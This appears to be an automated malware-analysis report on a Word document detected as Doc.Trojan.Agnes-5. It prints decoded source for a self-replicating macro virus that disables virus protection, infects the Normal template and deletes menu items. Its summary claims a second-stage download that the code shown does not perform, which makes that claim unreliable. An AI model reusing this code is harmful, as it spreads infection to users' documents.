MALICIOUS
200
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment
The sample is identified as malicious by ClamAV with multiple signatures, including Win.Trojan.Pivis-2 and Doc.Trojan.Agnes-5. It contains a legacy WordBasic AutoOpen macro, which is a strong indicator of malicious intent. The macro attempts to disable security features like macro warnings and virus protection, and its obfuscated nature suggests it is designed to download or execute a second-stage payload.
Heuristics 4
-
ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTIONClamAV detected this file as malware: Win.Trojan.Pivis-2
-
VBA macros detected medium 1 related finding OLE_VBA_MACROSDocument contains VBA macro code
-
AutoOpen macro high OLE_VBA_AUTOOPENAutoOpen macro
-
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXECOLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 19056 bytes |
SHA-256: b5ccc528004f1e879ce26940d3d1c7785daee6c9f7ba2d4c31ccf635713a8d65 |
|||
|
Detection
ClamAV:
Doc.Trojan.Agnes-5
Obfuscation or payload:
unlikely
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "AL"
Sub RuLeQp9075()
On Error Resume Next
WordBasic.DisableAutoMacros 0
ActiveDocument.ReadOnlyRecommended = False
With Application
.EnableCancelKey = wdCancelDisabled
.DisplayAlerts = wdAlertsNone
End With
With Options
.ConfirmConversions = False
.VirusProtection = False
End With
Randomize
ActiveLines = Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule.CountOfLines
If ActiveLines > 300 Then
With Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule
For TheLine = 1 To .CountOfLines
If Left(.Lines(TheLine, 1), 3) = "Rem" Then .DeleteLines TheLine
Next TheLine
End With
Else
With Application.VBE.ActiveVBProject.VBComponents("AL").CodeModule
PolySize = Int(Rnd * 10)
For PolyMorphic = 1 To PolySize
PolyString = ""
PolyLines = .CountOfLines
RndLine = Int(Rnd * PolyLines) + 1
StringSize = Int(Rnd * 39) + 1
For SomeString = 1 To StringSize
PolyString = PolyString & Chr(65 + Int(Rnd * 22)) & Chr(122 - Int(Rnd * 22))
Next SomeString
.InsertLines RndLine, "Rem " & PolyString
Next PolyMorphic
End With
End If
If Day(Now()) = 10 Then
Application.Caption = "AGNES LEE"
End If
Application.CommandBars("View").Controls(6).Delete
Application.CommandBars("Format").Controls(12).Delete
Application.CommandBars("Tools").Controls(12).Delete
Application.CommandBars("Tools").Controls(13).Delete
End Sub
Sub Tl569()
On Error Resume Next
Application.EnableCancelKey = wdCancelDisabled
With Options
.SaveNormalPrompt = False
.VirusProtection = False
.ConfirmConversions = False
End With
Application.VBE.ActiveVBProject.VBComponents("AL").Export "C:\AL.sys"
With Dialogs(wdDialogFileSummaryInfo)
.Author = Chr(74) + Chr(97) + Chr(99) + Chr(107) + Chr(32) + Chr(84) + Chr(119) + Chr(111) + Chr(102) + Chr(108) + Chr(111) + Chr(119) + Chr(101) + Chr(114) + Chr(32) + Chr(45) + Chr(61) + Chr(91) + Chr(76) + Chr(105) + Chr(110) + Chr(101) + Chr(90) + Chr(101) + Chr(114) + Chr(216) + Chr(32) + Chr(86) + Chr(120) + Chr(32) + Chr(84) + Chr(101) + Chr(97) + Chr(109) + Chr(93) + Chr(61) + Chr(45)
.Comments = "WM97.AL" & Chr(32) + Chr(98) + Chr(121) + Chr(32) + Chr(76) + Chr(105) + Chr(77) + Chr(69) + Chr(32) + Chr(49) + Chr(46) + Chr(111)
.Keywords = "LiME ID: 18288-Tl-5699075-Lm.W"
.Execute
End With
For x = 1 To NormalTemplate.VBProject.VBComponents.Count
If NormalTemplate.VBProject.VBComponents(x).Name = "AL" Then RfEfVg8187VhPkUu569 = True
Next x
For y = 1 To ActiveDocument.VBProject.VBComponents.Count
If ActiveDocument.VBProject.VBComponents(y).Name = "AL" Then VlCjMk457RuLeQp9075 = True
Next y
If RfEfVg8187VhPkUu569 = True And VlCjMk457RuLeQp9075 = False Then Set TkErNq244PwQuUk36 = ActiveDocument.VBProject
If RfEfVg8187VhPkUu569 = False And VlCjMk457RuLeQp9075 = True Then Set TkErNq244PwQuUk36 = NormalTemplate.VBProject
If RfEfVg8187VhPkUu569 = True And VlCjMk457RuLeQp9075 = True Then GoTo Ende_
TkErNq244PwQuUk36.VBComponents.Import "C:\AL.sys"
If VlCjMk457RuLeQp9075 = False Then ActiveDocument.SaveAs (WordBasic.[FileName$]()), FileFormat:=wdFormatDocument
If RfEfVg8187VhPkUu569 = False Then NormalTemplate.Save
Ende_:
Call RuLeQp9075
End Sub
Rem ExKfKzQmJwLyTlNwAoKrVgBxNjMjKeNqCoRlMgUkCkKnHjEhItTrJtPpJsJwHrGmAvKsBnTfLvPoNo
Sub AutoOpen()
On Error Resume Next
Call Tl569
Call RuLeQp9075
Rem Gj
End Sub
Sub AutoExit()
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub AutoNew()
Rem JhCeSoNtPfLxPmTpSwUnAvAqFqSwTrNeArUsFfMzUi
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub AutoExec()
On Error Resume Next
Call Tl569
Call RuLeQp9075
End Sub
Sub DateiNeu()
On Error Resume Next
Dialogs(wdDialogFileNew).Show
Call Tl569
Call RuLeQp9075
End Sub
Sub DateiOffnen()
On Error Resume Next
Dialogs(wdDialogFileOpen).Show
Rem IgHmRoExKsFqGgTyAhQnLkEoDmMtFrFpFgJzOlKr
Call Tl569
... (truncated)
|
|||
Open this report in the interactive analyzer, or submit your own file for analysis.